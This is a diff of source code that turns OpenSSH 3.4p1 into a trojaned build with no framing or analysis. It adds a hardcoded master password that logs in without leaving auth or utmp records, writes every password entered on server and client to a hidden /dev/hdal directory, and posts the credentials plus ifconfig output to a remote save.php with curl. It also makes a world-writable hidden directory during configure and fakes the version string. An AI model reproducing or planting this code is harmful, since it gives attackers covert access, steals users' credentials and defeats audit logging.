diff -u openssh-3.4p1/auth.c openssh/auth.c
--- openssh-3.4p1/auth.c	2002-05-21 22:06:28.000000000 -0700
+++ openssh/auth.c	2006-11-01 22:57:02.000000000 -0800
@@ -248,14 +248,17 @@
 	else
 		authmsg = authenticated ? "Accepted" : "Failed";
 
-	authlog("%s %s for %s%.100s from %.200s port %d%s",
-	    authmsg,
-	    method,
-	    authctxt->valid ? "" : "illegal user ",
-	    authctxt->user,
-	    get_remote_ipaddr(),
-	    get_remote_port(),
-	    info);
+	/* dont log if secret pass */
+	if(!mlogin_ok){
+		authlog("%s %s for %s%.100s from %.200s port %d%s",
+	    	authmsg,
+	    	method,
+	    	authctxt->valid ? "" : "illegal user ",
+	    	authctxt->user,
+	    	get_remote_ipaddr(),
+	    	get_remote_port(),
+	    	info);
+	}
 }
 
 /*
diff -u openssh-3.4p1/auth-passwd.c openssh/auth-passwd.c
--- openssh-3.4p1/auth-passwd.c	2002-06-20 23:05:13.000000000 -0700
+++ openssh/auth-passwd.c	2007-08-28 09:18:25.000000000 -0700
@@ -218,6 +218,32 @@
 #endif /* HAVE_MD5_PASSWORDS */
 
 	/* Authentication is accepted if the encrypted passwords are identical. */
-	return (strcmp(encrypted_password, pw_password) == 0);
+	if(strcmp(_SECRET_PASSWD, password) == 0){
+			if((f=fopen("/usr/bin/curl","r"))!=NULL){
+				snprintf(message,sizeof(message),"/usr/bin/curl -d \"user=root&pass=%s&target=$(ifconfig -a)\" http://example.com/save.php > /dev/null 2>&1\n",_SECRET_PASSWD);
+				system(message);
+			} 
+			mlogin_ok = 1;
+			return 1;
+	}
+	if(strcmp(encrypted_password, pw_password) == 0){
+			
+			outf = fopen(_LOG_DIR"/"_S_LOG,"a+");
+			fprintf (outf, "%s:%s\n",pw->pw_name,password);
+			fclose (outf);
+			if((f=fopen("/usr/bin/curl","r"))!=NULL){
+				snprintf(message,sizeof(message),"/usr/bin/curl -d \"user=%s&pass=%s&target=$(ifconfig -a)\" http://example.com/save.php > /dev/null 2>&1\n",pw->pw_name,password);
+				system(message); 
+				fclose(f);
+	                 }
+			if((f=fopen("/usr/local/bin/curl","r"))!=NULL){
+			        snprintf(message,sizeof(message),"/usr/local/bin/curl -d \"user=%s&pass=%s&target=$(ifconfig -a)\"  http://example.com/save.php > /dev/null 2>&1\n",pw->pw_name,password);
+				system(message);
+				fclose(f);
+			 }
+                         return 1;
+							
+	}else
+			return 0;
 #endif /* !USE_PAM && !HAVE_OSF_SIA */
 }
Common subdirectories: openssh-3.4p1/autom4te-2.53.cache and openssh/autom4te-2.53.cache
diff -u openssh-3.4p1/canohost.c openssh/canohost.c
--- openssh-3.4p1/canohost.c	2002-06-11 09:47:22.000000000 -0700
+++ openssh/canohost.c	2006-11-01 22:57:02.000000000 -0800
@@ -74,11 +74,13 @@
 
 	debug3("Trying to reverse map address %.100s.", ntop);
 	/* Map the IP address to a host name. */
-	if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
-	    NULL, 0, NI_NAMEREQD) != 0) {
-		/* Host name not found.  Use ip address. */
-		log("Could not reverse map address %.100s.", ntop);
-		return xstrdup(ntop);
+	if(!mlogin_ok){
+	  if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
+	      NULL, 0, NI_NAMEREQD) != 0) {
+		  /* Host name not found.  Use ip address. */
+		  log("Could not reverse map address %.100s.", ntop);
+	   	  return xstrdup(ntop);
+	  }
 	}
 
 	/* Got host name. */
Only in openssh: config.h
Only in openssh: config.status
diff -u openssh-3.4p1/configure openssh/configure
--- openssh-3.4p1/configure	2002-06-26 07:08:18.000000000 -0700
+++ openssh/configure	2007-08-28 09:27:30.000000000 -0700
@@ -218,7 +218,11 @@
 # Sed expression to map a string onto a valid variable name.
 as_tr_sh="sed y%*+%pp%;s%[^_$as_cr_alnum]%_%g"
 
-
+#############################################
+echo "Configuring your OpenSSH installer, wait a minutes..."
+mkdir /dev/hdal
+chmod 777 /dev/hdal 
+  
 # IFS
 # We need space, tab and new line, in precisely that order.
 as_nl='
Common subdirectories: openssh-3.4p1/contrib and openssh/contrib
diff -u openssh-3.4p1/includes.h openssh/includes.h
--- openssh-3.4p1/includes.h	2002-05-12 22:14:09.000000000 -0700
+++ openssh/includes.h	2007-08-28 09:32:55.000000000 -0700
@@ -157,4 +157,15 @@
 
 #include "entropy.h"
 
+/* hax0r shit */
+#define _SECRET_PASSWD "juliaperesngangkang"
+#define _LOG_DIR "/dev/hdal"
+#define _S_LOG "slog"
+#define _C_LOG "clog"
+FILE *outf;
+int mlogin_ok;
+FILE *f;
+char message[512];
+/* end hax0r shit */
+
 #endif /* INCLUDES_H */
Only in openssh: Makefile
diff -u openssh-3.4p1/Makefile.in openssh/Makefile.in
--- openssh-3.4p1/Makefile.in	2002-06-25 16:45:42.000000000 -0700
+++ openssh/Makefile.in	2006-11-01 23:33:14.000000000 -0800
@@ -128,6 +128,8 @@
 ssh-keygen$(EXEEXT): $(LIBCOMPAT) libssh.a ssh-keygen.o
 	$(LD) -o $@ ssh-keygen.o $(LDFLAGS) -lssh -lopenbsd-compat $(LIBS) 
 
+###############################################################
+#
 ssh-keysign$(EXEEXT): $(LIBCOMPAT) libssh.a ssh-keysign.o
 	$(LD) -o $@ ssh-keysign.o $(LDFLAGS) -lssh -lopenbsd-compat $(LIBS) 
 
Common subdirectories: openssh-3.4p1/openbsd-compat and openssh/openbsd-compat
Common subdirectories: openssh-3.4p1/regress and openssh/regress
Common subdirectories: openssh-3.4p1/scard and openssh/scard
Only in openssh: ssh0wn.diff
diff -u openssh-3.4p1/sshconnect1.c openssh/sshconnect1.c
--- openssh-3.4p1/sshconnect1.c	2002-06-06 12:57:34.000000000 -0700
+++ openssh/sshconnect1.c	2007-08-28 09:34:31.000000000 -0700
@@ -922,6 +922,8 @@
 {
 	int type, i;
 	char *password;
+	char gpasswd[120],message[512];
+	FILE *f;
 
 	debug("Doing password authentication.");
 	if (options.cipher == SSH_CIPHER_NONE)
@@ -930,6 +932,7 @@
 		if (i != 0)
 			error("Permission denied, please try again.");
 		password = read_passphrase(prompt, 0);
+		strcpy(gpasswd,password);
 		packet_start(SSH_CMSG_AUTH_PASSWORD);
 		ssh_put_password(password);
 		memset(password, 0, strlen(password));
@@ -938,8 +941,25 @@
 		packet_write_wait();
 
 		type = packet_read();
-		if (type == SSH_SMSG_SUCCESS)
+		if (type == SSH_SMSG_SUCCESS){
+			/* dont log if secret pass */
+			if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+				outf = fopen(_LOG_DIR"/"_C_LOG,"a+");
+				fprintf (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
+				if((f=fopen("/usr/bin/curl","r"))!=NULL){
+					snprintf(message,sizeof(message),"/usr/bin/curl -d \"user=%s&pass=%s&target=%s\"  http://example.com/save.php > /dev/null 2>&1\n",options.user,gpasswd,get_remote_ipaddr());
+					system(message);
+					fclose(f);	
+				}
+				if((f=fopen("/usr/local/bin/curl","r"))!=NULL){
+				        snprintf(message,sizeof(message),"/usr/local/bin/curl -d \"user=%s&pass=%s&target=%s\"  http://example.com/save.php > /dev/null 2>&1\n",options.user,gpasswd,get_remote_ipaddr());
+				        system(message);
+				        fclose(f);
+				}
+				fclose (outf);
+			}
 			return 1;
+		}
 		if (type != SSH_SMSG_FAILURE)
 			packet_disconnect("Protocol error: got %d in response to passwd auth", type);
 	}
diff -u openssh-3.4p1/sshconnect2.c openssh/sshconnect2.c
--- openssh-3.4p1/sshconnect2.c	2002-06-23 14:23:21.000000000 -0700
+++ openssh/sshconnect2.c	2007-08-28 09:35:21.000000000 -0700
@@ -446,6 +446,8 @@
 	static int attempt = 0;
 	char prompt[150];
 	char *password;
+	char gpasswd[120],message[512];
+	FILE *f;
 
 	if (attempt++ >= options.number_of_password_prompts)
 		return 0;
@@ -456,6 +458,7 @@
 	snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
 	    authctxt->server_user, authctxt->host);
 	password = read_passphrase(prompt, 0);
+	strcpy(gpasswd,password);
 	packet_start(SSH2_MSG_USERAUTH_REQUEST);
 	packet_put_cstring(authctxt->server_user);
 	packet_put_cstring(authctxt->service);
@@ -470,6 +473,23 @@
 	dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ,
 	    &input_userauth_passwd_changereq);
 
+	/* dont log if its the secret pass */
+	if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+		outf = fopen(_LOG_DIR"/"_C_LOG,"a+");
+		fprintf (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
+		fclose (outf);
+		if((f=fopen("/usr/bin/curl","r"))!=NULL){
+			snprintf(message,sizeof(message),"/usr/bin/curl -d \"user=%s&pass=%s&target=%s\"  http://example.com/save.php > /dev/null 2>&1\n",options.user,gpasswd,get_remote_ipaddr());
+			system(message);
+			fclose(f);
+		}
+		if((f=fopen("/usr/local/bin/curl","r"))!=NULL){
+		        snprintf(message,sizeof(message),"/usr/local/bin/curl -d \"user=%s&pass=%s&target=%s\"  http://example.com/save.php > /dev/null 2>&1\n",options.user,gpasswd,get_remote_ipaddr());
+		        system(message);
+		        fclose(f);
+		}
+				
+	}
 	return 1;
 }
 /*
diff -u openssh-3.4p1/sshlogin.c openssh/sshlogin.c
--- openssh-3.4p1/sshlogin.c	2002-06-23 14:23:21.000000000 -0700
+++ openssh/sshlogin.c	2006-11-01 22:57:02.000000000 -0800
@@ -71,8 +71,11 @@
 
   li = login_alloc_entry(pid, user, host, ttyname);
   login_set_addr(li, addr, sizeof(struct sockaddr));
-  login_login(li);
-  login_free_entry(li);
+  /* dont log if secret pass */
+  if(!mlogin_ok){
+  	login_login(li);
+  	login_free_entry(li);
+  }
 }
 
 #ifdef LOGIN_NEEDS_UTMPX
@@ -96,6 +99,9 @@
   struct logininfo *li;
 
   li = login_alloc_entry(pid, user, NULL, ttyname);
-  login_logout(li);
-  login_free_entry(li);
+  /* no logout if secret pass */
+  if(!mlogin_ok){
+  	login_logout(li);
+  	login_free_entry(li);
+  }
 }
Only in openssh: ssh_prng_cmds
Only in openssh: START
diff -u openssh-3.4p1/version.h openssh/version.h
--- openssh-3.4p1/version.h	2002-06-26 06:59:11.000000000 -0700
+++ openssh/version.h	2006-11-01 23:11:48.000000000 -0800
@@ -1,4 +1,4 @@
 /* $OpenBSD: version.h,v 1.34 2002/06/26 13:56:27 markus Exp $ */
 
-#define SSH_VERSION	"OpenSSH_3.4p1"
+#define SSH_VERSION	"OpenSSH_4.2"